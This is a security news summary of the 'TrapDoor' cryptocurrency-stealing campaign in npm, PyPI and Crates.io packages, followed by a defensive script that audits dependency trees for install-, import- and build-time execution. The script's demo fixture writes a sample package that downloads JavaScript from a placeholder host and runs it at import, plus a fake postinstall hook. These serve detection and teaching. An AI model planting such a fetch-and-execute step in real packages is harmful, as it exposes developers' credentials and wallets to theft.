GetChain News

TrapDoor Cryptocurrency Theft Campaign Spans npm, PyPI, and Crates.io, Involving Over 34 Malicious Packages

Source: socket.dev. Event types: Online/Update, Security/Hacker
According to research by security firm Socket Security, a cryptocurrency-stealing supply chain attack dubbed “TrapDoor” spans npm, PyPI, and Crates.io, involving over 34 malicious packages and 384 related versions and artifacts. The attack targets cryptocurrency, DeFi, Solana, Sui, Move, and AI developers. The samples steal sensitive information including SSH keys, wallet data, AWS credentials, GitHub tokens, browser data, and environment variables. Each ecosystem is abused through a different execution vector: npm packages run the shared payload `trap-core.js` from the `postinstall` hook, PyPI packages fetch and execute remote JavaScript when imported, and Crates.io packages steal local keystores from `build.rs`. In all three cases the code runs at install, import, or build time, before the developer deliberately calls anything in the package, so simply adding the dependency is enough to be compromised. Socket has flagged all related packages as malicious and reported them to the respective package registries.
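The three vectors described above are all visible in a checked-out dependency tree before any code is run. The script below is an added example (not Socket's tooling and not code from the article): it audits a directory for npm packages with install-time lifecycle hooks, crates that ship a `build.rs`, and Python packages whose `__init__.py` both fetches a URL and spawns a process at module top level. The package names and file contents it creates are constructed for the demo, and the Python check is a heuristic based on an assumed list of fetch and exec call names, not a complete detector.

```python
"""Audit a dependency tree for install/import/build-time execution vectors.
Added example; the sample packages it builds are hypothetical, not real artifacts."""
import ast
import json
import tempfile
from pathlib import Path

# npm lifecycle hooks that run during `npm install` with no application code involved.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic (assumed, not exhaustive): dotted call names that spawn a process.
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
              "subprocess.check_output", "subprocess.check_call",
              "os.system", "os.popen"}
# Heuristic: call names that fetch remote content (full name or last component).
FETCH_FULL = {"requests.get", "requests.post", "httpx.get"}
FETCH_LAST = {"urlopen", "urlretrieve"}


def npm_install_hooks(node_modules: Path) -> list:
    """Return (package, hook, command) for every install-time script in node_modules."""
    findings = []
    for manifest in sorted(node_modules.rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        scripts = data.get("scripts") or {}
        for hook in NPM_INSTALL_HOOKS:
            if hook in scripts:
                findings.append((data.get("name", manifest.parent.name), hook, scripts[hook]))
    return findings


def cargo_build_scripts(registry_src: Path) -> list:
    """Return crate directories that ship a build.rs (runs at `cargo build` time)."""
    return sorted(p.parent.name for p in registry_src.glob("*/build.rs"))


def _dotted(node: ast.AST) -> str:
    """Render a call target like `urllib.request.urlopen` as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def python_import_time_exec(site_packages: Path) -> list:
    """Flag packages whose __init__.py fetches a URL AND spawns a process at top level.
    Statements inside def/class bodies are ignored: they do not run on import."""
    flagged = []
    for init in sorted(site_packages.glob("*/__init__.py")):
        try:
            module = ast.parse(init.read_text(encoding="utf-8"))
        except (SyntaxError, OSError):
            continue
        fetches = executes = False
        for stmt in module.body:
            if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
                continue
            for node in ast.walk(stmt):
                if isinstance(node, ast.Call):
                    name = _dotted(node.func)
                    fetches |= name in FETCH_FULL or name.rsplit(".", 1)[-1] in FETCH_LAST
                    executes |= name in EXEC_CALLS
        if fetches and executes:
            flagged.append(init.parent.name)
    return flagged


def audit(root: Path) -> dict:
    """Run all three checks against an assumed layout: node_modules/, registry/src/, site-packages/."""
    return {"npm": npm_install_hooks(root / "node_modules"),
            "cargo": cargo_build_scripts(root / "registry" / "src"),
            "python": python_import_time_exec(root / "site-packages")}


def build_sample_tree(root: Path) -> None:
    """Constructed sample tree: one suspicious and one benign package per ecosystem (hypothetical names)."""
    nm = root / "node_modules"
    (nm / "fake-trap-sdk").mkdir(parents=True)
    (nm / "fake-trap-sdk" / "package.json").write_text(json.dumps(
        {"name": "fake-trap-sdk", "scripts": {"postinstall": "node trap-core.js"}}))
    (nm / "harmless-lib").mkdir()
    (nm / "harmless-lib" / "package.json").write_text(json.dumps(
        {"name": "harmless-lib", "scripts": {"test": "node test.js"}}))
    src = root / "registry" / "src"
    (src / "fake-trap-crate-0.1.0").mkdir(parents=True)
    (src / "fake-trap-crate-0.1.0" / "build.rs").write_text("fn main() {}\n")
    (src / "harmless-crate-1.0.0").mkdir()
    (src / "harmless-crate-1.0.0" / "lib.rs").write_text("pub fn ok() {}\n")
    sp = root / "site-packages"
    (sp / "fakepkg").mkdir(parents=True)
    (sp / "fakepkg" / "__init__.py").write_text(
        "import subprocess, urllib.request\n"
        "_js = urllib.request.urlopen('http://example.invalid/p.js').read()\n"
        "subprocess.run(['node', '-e', _js])\n")
    (sp / "harmlesspkg").mkdir()
    (sp / "harmlesspkg" / "__init__.py").write_text(
        "import subprocess\ndef helper():\n    return subprocess.run(['echo'])\n")


def run_demo() -> dict:
    """Build the constructed tree in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp())
    build_sample_tree(root)
    return audit(root)


if __name__ == "__main__":
    for ecosystem, hits in run_demo().items():
        print(ecosystem, hits)
```

Point `audit()` at a real checkout (adjusting the assumed sub-paths) to get a list worth reviewing by hand; a hook or `build.rs` is not proof of malice, only a place where code runs without being called. For npm specifically, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) disables the lifecycle hooks entirely, which is the setting to use on CI and developer machines that handle wallet or cloud credentials.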